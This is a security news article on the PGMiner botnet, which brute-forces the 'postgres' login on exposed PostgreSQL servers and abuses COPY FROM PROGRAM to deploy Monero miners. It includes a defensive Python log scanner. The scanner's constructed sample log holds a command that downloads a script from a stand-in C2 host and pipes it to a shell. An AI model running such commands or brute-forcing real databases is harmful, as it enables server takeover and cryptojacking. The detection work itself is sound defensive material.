Security researchers at Palo Alto Networks have discovered a new botnet, named PGMiner, that targets PostgreSQL databases running on Linux servers in order to install cryptocurrency miners.
PostgreSQL, also known as Postgres, is one of the most widely used open-source relational database management systems (RDBMS) in production environments. As of November 2020 it ranked fourth among all database management systems (DBMS).
The botnet brute-forces PostgreSQL databases exposed on the Internet, then abuses a disputed PostgreSQL remote code execution (RCE) flaw to take over the database server. Interestingly, threat actors have begun to weaponize disputed CVEs, not just confirmed ones.
“The feature exploited in PostgreSQL is ‘copy from program’, which was introduced in version 9.3 on September 9, 2013. In 2018, CVE-2019-9193 was linked to this feature, naming it a ‘vulnerability’. However, the PostgreSQL community challenged this assignment, and the CVE has been marked as ‘disputed’,” reads the analysis published by Palo Alto Networks Unit 42.
“We believe PGMiner is the first cryptocurrency mining botnet delivered through PostgreSQL.”
The attack chain starts by randomly picking a public network range (e.g. 22.214.171.124, 126.96.36.199) and attempting to break into PostgreSQL servers exposed online on port 5432.
PGMiner targets the default user “postgres” and brute-forces its password from a built-in list of commonly used passwords, such as “112233” and “1q2w3e4r”, to get past authentication.
Once the bot has access to the database, it uses PostgreSQL’s “copy from program” feature to download and launch the coin-mining script directly on the database server.
The “copy from program” feature has been controversial since its debut in PostgreSQL 9.3. It allows a local or remote superuser to run shell commands directly on the server, which raises obvious security concerns. In 2019 the feature was assigned CVE-2019-9193, classifying it as a vulnerability. However, the PostgreSQL community challenged this assignment, and the CVE was marked as “disputed”.
“The main argument against defining this feature as a vulnerability is that, as long as superuser privileges are not granted to remote or untrusted users and the access control and authentication system works well, the feature itself does not pose a risk,” the analysis continues. “On the other hand, security researchers are concerned that if an attacker manages to obtain superuser privileges by brute-forcing a password or through SQL injection, this feature does make PostgreSQL a stepping stone for remote exploitation and code execution, going beyond the PostgreSQL software and directly onto the server’s operating system.”
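As an added example (not code from the article, from Unit 42 or from the PostgreSQL project), the following Python script runs the two detections a defender would want for the attack chain described above: a burst of failed password logins for the “postgres” role from a single source host, and any logged statement that uses COPY ... FROM PROGRAM. The log_line_prefix format, the sample log lines and the c2.invalid download URL are assumptions constructed for this example.

```python
"""Detect PGMiner-style activity in PostgreSQL server logs.

Signal 1: repeated "password authentication failed" entries for one role
          from one client host inside a short window (brute force).
Signal 2: any statement using COPY ... FROM PROGRAM, which executes a shell
          command on the database host.

Assumption (not from the article): log_line_prefix = '%m [%p] %u@%d %h '.
Adjust LINE_RE if your server logs a different prefix.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# timestamp, tz, [pid], user@db, client host, severity, message
LINE_RE = re.compile(
    r'^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d+) \S+ \[\d+\] '
    r'(?P<user>[^@\s]+)@(?P<db>\S+) (?P<host>\S+) (?P<level>[A-Z]+):\s+(?P<msg>.*)$'
)
AUTH_FAIL_RE = re.compile(r'^password authentication failed for user "(?P<user>[^"]+)"')
STMT_RE = re.compile(r'^statement:\s*(?P<sql>.*)$', re.DOTALL)
# The feature the botnet abuses: COPY <table> FROM PROGRAM '<shell command>'
COPY_PROGRAM_RE = re.compile(r'\bCOPY\b.+?\bFROM\s+PROGRAM\b', re.IGNORECASE | re.DOTALL)


def parse(line):
    """Return the prefix fields and message as a dict, or None if the line does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec['ts'] = datetime.strptime(rec['ts'], '%Y-%m-%d %H:%M:%S.%f')
    return rec


def find_bruteforce(lines, threshold=5, window=timedelta(minutes=1)):
    """(host, user, peak) for every host/role pair with >= threshold failed logins in any window."""
    fails = defaultdict(list)
    for line in lines:
        rec = parse(line)
        if not rec or rec['level'] != 'FATAL':
            continue
        am = AUTH_FAIL_RE.match(rec['msg'])
        if am:
            fails[(rec['host'], am.group('user'))].append(rec['ts'])
    hits = []
    for (host, user), times in fails.items():
        times.sort()
        start, peak = 0, 0
        for end, t in enumerate(times):          # sliding window over sorted timestamps
            while t - times[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            hits.append((host, user, peak))
    return sorted(hits)


def find_copy_program(lines):
    """(host, user, sql) for every logged statement that invokes COPY ... FROM PROGRAM."""
    hits = []
    for line in lines:
        rec = parse(line)
        if not rec or rec['level'] != 'LOG':
            continue
        sm = STMT_RE.match(rec['msg'])
        if sm and COPY_PROGRAM_RE.search(sm.group('sql')):
            hits.append((rec['host'], rec['user'], sm.group('sql').strip()))
    return hits


def report(lines):
    """Both detections in one dict, convenient for feeding a SIEM or a cron job."""
    return {'bruteforce': find_bruteforce(lines), 'copy_program': find_copy_program(lines)}


# Constructed sample log (not from the article or any real incident):
# five failed logins in ~2 s from one host, a successful login, then COPY FROM PROGRAM.
SAMPLE_LOG = [
    '2020-12-10 10:00:01.001 UTC [4101] postgres@postgres 198.51.100.7 FATAL:  password authentication failed for user "postgres"',
    '2020-12-10 10:00:01.450 UTC [4102] postgres@postgres 198.51.100.7 FATAL:  password authentication failed for user "postgres"',
    '2020-12-10 10:00:02.010 UTC [4103] postgres@postgres 198.51.100.7 FATAL:  password authentication failed for user "postgres"',
    '2020-12-10 10:00:02.520 UTC [4104] postgres@postgres 198.51.100.7 FATAL:  password authentication failed for user "postgres"',
    '2020-12-10 10:00:03.100 UTC [4105] postgres@postgres 198.51.100.7 FATAL:  password authentication failed for user "postgres"',
    '2020-12-10 10:00:03.700 UTC [4106] postgres@postgres 198.51.100.7 LOG:  connection authorized: user=postgres database=postgres',
    '2020-12-10 10:00:04.200 UTC [4106] postgres@postgres 198.51.100.7 LOG:  statement: DROP TABLE IF EXISTS tmp; CREATE TABLE tmp(t text);',
    "2020-12-10 10:00:04.900 UTC [4106] postgres@postgres 198.51.100.7 LOG:  statement: COPY tmp FROM PROGRAM 'curl -fsSL http://c2.invalid/x.sh | sh';",
    # benign noise: one typo'd password and an ordinary COPY FROM STDIN must not alert
    '2020-12-10 10:05:00.000 UTC [4200] app@inventory 10.0.0.12 FATAL:  password authentication failed for user "app"',
    '2020-12-10 10:05:01.000 UTC [4201] app@inventory 10.0.0.12 LOG:  statement: COPY inventory FROM STDIN;',
]

if __name__ == '__main__':
    for kind, hits in report(SAMPLE_LOG).items():
        for hit in hits:
            print(kind, *hit)
```

Failed password logins are written to the server log by default, but the COPY statement is only visible with statement logging (log_statement = 'all', or an extension such as pgAudit), so enable that before relying on the second signal. Since PostgreSQL 11 the feature is reachable not only by superusers but also by members of the pg_execute_server_program role, so audit membership of that role together with the superuser list, and keep port 5432 off the public Internet in the first place.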
The PGMiner bot then deploys a Monero cryptocurrency miner which, at the time the report was published, targeted Linux on the MIPS, ARM and x64 platforms.
The operators use a command-and-control (C2) server hosted on the Tor network, and the experts point out that the code base of this threat borrows from the SystemdMiner botnet.
Researchers at Palo Alto Networks Unit 42 believe PGMiner could be highly disruptive because of PostgreSQL’s popularity, and warn that with extra effort the malware could target all major operating systems.
The experts also observed new techniques, such as embedding victim identification in requests, downloading curl binaries in several different ways, and impersonating trusted process names.
“PostgreSQL is available for all major platforms, including macOS, Windows and Linux. In theory, the malware actors could implement another version of PGMiner for new platforms such as Windows and deliver it via PostgreSQL,” the analysis concludes.